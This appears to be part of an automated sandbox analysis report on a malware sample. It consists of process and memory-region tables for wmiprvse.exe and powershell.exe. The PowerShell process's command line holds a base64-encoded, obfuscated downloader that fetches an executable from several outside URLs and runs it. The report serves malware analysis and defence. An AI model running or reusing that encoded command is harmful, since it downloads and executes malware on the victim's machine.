| fvecerts.dll | 0x7fefac70000 | 0x7fefac78fff | Memory Mapped File | rwx |
|
|
|
- |
| tbs.dll | 0x7fefac80000 | 0x7fefac88fff | Memory Mapped File | rwx |
|
|
|
- |
| fveapi.dll | 0x7fefac90000 | 0x7feface5fff | Memory Mapped File | rwx |
|
|
|
- |
| shsvcs.dll | 0x7fefacf0000 | 0x7fefad4dfff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7fefad50000 | 0x7fefad67fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7fefad70000 | 0x7fefad80fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7fefae80000 | 0x7fefaed2fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7fefaff0000 | 0x7fefaffafff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7fefb000000 | 0x7fefb026fff | Memory Mapped File | rwx |
|
|
|
- |
| sens.dll | 0x7fefb030000 | 0x7fefb043fff | Memory Mapped File | rwx |
|
|
|
- |
| es.dll | 0x7fefb060000 | 0x7fefb0c6fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb0d0000 | 0x7fefb0dafff | Memory Mapped File | rwx |
|
|
|
- |
| dsrole.dll | 0x7fefb0e0000 | 0x7fefb0ebfff | Memory Mapped File | rwx |
|
|
|
- |
| themeservice.dll | 0x7fefb0f0000 | 0x7fefb0fffff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb100000 | 0x7fefb118fff | Memory Mapped File | rwx |
|
|
|
- |
| profsvc.dll | 0x7fefb120000 | 0x7fefb156fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x7fefb1a0000 | 0x7fefb1b4fff | Memory Mapped File | rwx |
|
|
|
- |
| gpsvc.dll | 0x7fefb1c0000 | 0x7fefb281fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefb4a0000 | 0x7fefb4ccfff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x7fefb5b0000 | 0x7fefb5c0fff | Memory Mapped File | rwx |
|
|
|
- |
| srvsvc.dll | 0x7fefb5d0000 | 0x7fefb60cfff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7fefb610000 | 0x7fefb6f1fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 241 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #3: wmiprvse.exe
0
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\wbem\wmiprvse.exe |
| Command Line | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:52, Reason: RPC Server |
| Unmonitor | End Time: 00:04:55, Reason: Terminated by Timeout |
| Monitor Duration | 00:04:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa54 |
| Parent PID | 0x254 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A58
0x
A5C
0x
A60
0x
A64
0x
A68
0x
A6C
0x
A70
0x
A74
0x
AC0
0x
734
0x
56C
0x
630
0x
A8C
0x
7D8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x0032ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x00330fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00340fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00350fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00362fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x00374fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00381fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x00647fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008b0000 | 0x008b0000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000940000 | 0x00940000 | 0x009bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x00a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a50000 | 0x00a50000 | 0x00b4ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00b50000 | 0x00e1efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000e20000 | 0x00e20000 | 0x01212fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001240000 | 0x01240000 | 0x012bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001260000 | 0x01260000 | 0x012dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001300000 | 0x01300000 | 0x0137ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001320000 | 0x01320000 | 0x0139ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000013a0000 | 0x013a0000 | 0x0141ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001420000 | 0x01420000 | 0x0151ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000014c0000 | 0x014c0000 | 0x0153ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001540000 | 0x01540000 | 0x015bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000015c0000 | 0x015c0000 | 0x0163ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016b0000 | 0x016b0000 | 0x0172ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001730000 | 0x01730000 | 0x01a72fff | Pagefile Backed Memory | r |
|
|
|
- |
| wmi.dll | 0x75220000 | 0x75222fff | Memory Mapped File | rwx |
|
|
|
- |
| security.dll | 0x75230000 | 0x75232fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| wmiprvse.exe | 0xff5b0000 | 0xff60efff | Memory Mapped File | rwx |
|
|
|
- |
| cimwin32.dll | 0x7fee3380000 | 0x7fee3579fff | Memory Mapped File | rwx |
|
|
|
- |
| framedynos.dll | 0x7fee3730000 | 0x7fee377bfff | Memory Mapped File | rwx |
|
|
|
- |
| wmipcima.dll | 0x7fef3020000 | 0x7fef304bfff | Memory Mapped File | rwx |
|
|
|
- |
| schedcli.dll | 0x7fef3050000 | 0x7fef3059fff | Memory Mapped File | rwx |
|
|
|
- |
| browcli.dll | 0x7fef3060000 | 0x7fef3071fff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x7fef30b0000 | 0x7fef30b7fff | Memory Mapped File | rwx |
|
|
|
- |
| ncobjapi.dll | 0x7fef5630000 | 0x7fef5645fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiutils.dll | 0x7fef5790000 | 0x7fef57b5fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7fef5e10000 | 0x7fef5e95fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef8e70000 | 0x7fef8e7efff | Memory Mapped File | rwx |
|
|
|
- |
| dsrole.dll | 0x7fefb0e0000 | 0x7fefb0ebfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefb4a0000 | 0x7fefb4ccfff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7fefb610000 | 0x7fefb6f1fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x7fefb700000 | 0x7fefb713fff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x7fefb720000 | 0x7fefb734fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7fefb740000 | 0x7fefb74bfff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x7fefb750000 | 0x7fefb765fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7fefb780000 | 0x7fefb793fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x7fefb810000 | 0x7fefb836fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7fefb880000 | 0x7fefb890fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7fefb8a0000 | 0x7fefb8aefff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefc8d0000 | 0x7fefc8edfff | Memory Mapped File | rwx |
|
|
|
- |
| credssp.dll | 0x7fefca20000 | 0x7fefca29fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefcb20000 | 0x7fefcb66fff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x7fefcbb0000 | 0x7fefcc06fff | Memory Mapped File | rwx |
|
|
|
- |
| logoncli.dll | 0x7fefcc10000 | 0x7fefcc3ffff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefce20000 | 0x7fefce36fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd320000 | 0x7fefd342fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7fefd3c0000 | 0x7fefd3cafff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefd3f0000 | 0x7fefd414fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefd420000 | 0x7fefd42efff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7fefd4d0000 | 0x7fefd50cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7fefd510000 | 0x7fefd523fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefd530000 | 0x7fefd53efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7fefd5d0000 | 0x7fefd5defff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefd6c0000 | 0x7fefd6d9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd6e0000 | 0x7fefd74afff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7fefd750000 | 0x7fefd8b6fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd8c0000 | 0x7fefd8f5fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7fefd900000 | 0x7fefd94cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefd970000 | 0x7fefda78fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7fefda80000 | 0x7fefdbacfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdce0000 | 0x7fefdcedfff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdd70000 | 0x7fefde38fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefde40000 | 0x7fefde47fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefebe0000 | 0x7fefec0dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7fefed90000 | 0x7fefee6afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7fefee70000 | 0x7feff072fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff2e0000 | 0x7feff37efff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feff380000 | 0x7feff456fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feff4e0000 | 0x7feff531fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7feff540000 | 0x7feff5a6fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff5b0000 | 0x7feff648fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff830000 | 0x7feff84efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feff900000 | 0x7feff900fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007fffffa8000 | 0x7fffffa8000 | 0x7fffffa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffaa000 | 0x7fffffaa000 | 0x7fffffabfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffac000 | 0x7fffffac000 | 0x7fffffadfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
Process #4: powershell.exe
606
166
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powersheLl -e JAB3ADcANgA2ADQAMgA4AD0AKAAnAFYAOAAnACsAJwBfADIAJwArACcANAA1ACcAKQA7ACQAUgAwAF8AXwAyADIANgAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAMAAzAF8AMAA2ADUAXwA9ACgAJwBoAHQAdABwADoALwAnACsAJwAvAG4AZQB1AG0AYQB0AGkAJwArACcAYwBvACcAKwAnAHMAdQAnACsAJwB0AGkAbABpAHoAYQBkACcAKwAnAG8AJwArACcAcwAuACcAKwAnAGMAbwBtAC8AMQBUACcAKwAnAEkAOAAxACcAKwAnAFAAUgBRAEwATwBSAFIAQAAnACsAJwBoAHQAdAAnACsAJwBwADoALwAvAHcAaAAnACsAJwBpAHMAawB5AHMAaABpAHAAcAAnACsAJwBlAHIALgBjAG8AbQAvAHcAcAAnACsAJwAtACcAKwAnAGMAbwBuAHQAZQBuAHQALwAnACsAJwBBADgAQgBSACcAKwAnAFMAOQAnACsAJwBzAEwAJwArACcAbAA4ACcAKwAnAGkAXwBQADgARAAnACsAJwBCAHMATABoAG8AQABoAHQAdABwACcAKwAnADoALwAvACcAKwAnAGcAZQBlACcAKwAnAHMAdABkACcAKwAnAHIAJwArACcAaQBmAHQAbgB1AC4AYwAnACsAJwBvAG0ALwBnAHEAWAAnACsAJwBiADMAZwAnACsAJwBoAGsAJwArACcAUgBaAEoANgB0ACcAKwAnAGoATAA4AF8AWQBAAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AbQAnACsAJwBhAHQAJwArACcAZQB4AC4AJwArACcAYgBpAHoALwAvAFIAJwArACcAUQBSADAAJwArACcAUgBhAG8AaABpAFIAXwBQAEAAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwBiACcAKwAnAGUAZQBwACcAKwAnAG0AJwArACcAZQAnACsAJwAuAGUAdQAvAE8AdAAnACsAJwB3AG4AcwBlAHUATQBpAFEAZQB0AGYAQgAnACsAJwBzACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEEANgBfADAANgA3AD0AKAAnAG4AXwAnACsAJwAyADIAJwArACcAXwBfACcAKQA7ACQAawA5AF8AMwAwADAAXwAwACAAPQAgACgAJwA2ADIAJwArACcAOQAnACkAOwAkAEsANABfADMAMgAzAF8AOQA9ACgAJwBSACcAKwAnAF8ANwA5AF8AXwAnACsAJwA3ACcAKQA7ACQAaQA2ADUANwAzADQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGsAOQBfADMAMAAwAF8AMAArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFEAXwA2ADkANQA1ADEAMwAgAGkAbgAgACQAVgAwADMAXwAwADYANQBfACkAewB0AHIAeQB7ACQAUgAwAF8AXwAyADIANgAxAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFEAXwA2ADkANQA1ADEAMwAsACAAJABpADYANQA3ADMANAApADsAJABpADAAOQAxAF8ANgA4AD0AKAAnAFUAOQAnACsAJwA5AF8AXwA3ACcAKwAnADEAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAaQA2ADUANwAzADQAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABpADYANQA3ADMANAA7ACQAegBfADMAXwAxADYAXwAyAD0AKAAnAFYAMwAnACsAJwAzACcAKwAnADQAMQA0ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABmADQAXwBfADkAMQA5ADQAPQAoACcAVQAyADEAOQBfACcAKwAnAF8AJwArACcAOABfACcAKQA7AA== |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:52, Reason: Child Process |
| Unmonitor | End Time: 00:01:17, Reason: Self Terminated |
| Monitor Duration | 00:00:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa78 |
| Parent PID | 0xa54 (c:\windows\system32\wbem\wmiprvse.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A7C
0x
A90
0x
A94
0x
A98
0x
A9C
0x
AA0
0x
AA4
0x
ACC
0x
AD0
0x
AD4
0x
B38
0x
B44
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x000e0000 | 0x000e2fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x001e0000 | 0x001e3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x003f0000 | 0x0040ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00490fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x004a0000 | 0x004a3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x00647fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x01bdffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001be0000 | 0x01be0000 | 0x01cdffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x01ce0000 | 0x01d0ffff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01d10000 | 0x01d75fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001d80000 | 0x01d80000 | 0x01d80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d90000 | 0x01d90000 | 0x01d9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001da0000 | 0x01da0000 | 0x01e7efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x01e82fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e90000 | 0x01e90000 | 0x01e90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01ebffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001ec0000 | 0x01ec0000 | 0x01ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ed0000 | 0x01ed0000 | 0x01f4ffff | Private Memory | rwx |
|
|
|
- |
| l_intl.nls | 0x01f50000 | 0x01f52fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x01f60fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01f70000 | 0x01f74fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01f80000 | 0x01f87fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001f90000 | 0x01f90000 | 0x01f90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001fa0000 | 0x01fa0000 | 0x01fa0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fb0000 | 0x01fb0000 | 0x0202ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002070000 | 0x02070000 | 0x020effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x020f0000 | 0x023befff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x027b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000027e0000 | 0x027e0000 | 0x0285ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002880000 | 0x02880000 | 0x028fffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a40000 | 0x02a40000 | 0x02abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02b7ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02b80000 | 0x02c3ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002c40000 | 0x02c40000 | 0x02c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x1ac4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ac50000 | 0x1ac50000 | 0x1b31ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b320000 | 0x1b320000 | 0x1b420fff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x1b430000 | 0x1b470fff | Memory Mapped File | r |
|
|
|
- |
| mscorrc.dll | 0x1b480000 | 0x1b4d3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000001b520000 | 0x1b520000 | 0x1b59ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b5a0000 | 0x1b881fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000001b890000 | 0x1b890000 | 0x1b98ffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x74db0000 | 0x74e78fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x777a0000 | 0x777a6fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13fcb0000 | 0x13fd26fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fedf250000 | 0x7fedf3e4fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7fedf3f0000 | 0x7fedf55bfff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fedf560000 | 0x7fedfc04fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fedfc10000 | 0x7fedfc4dfff | Memory Mapped File | rwx |
|
|
|
- |
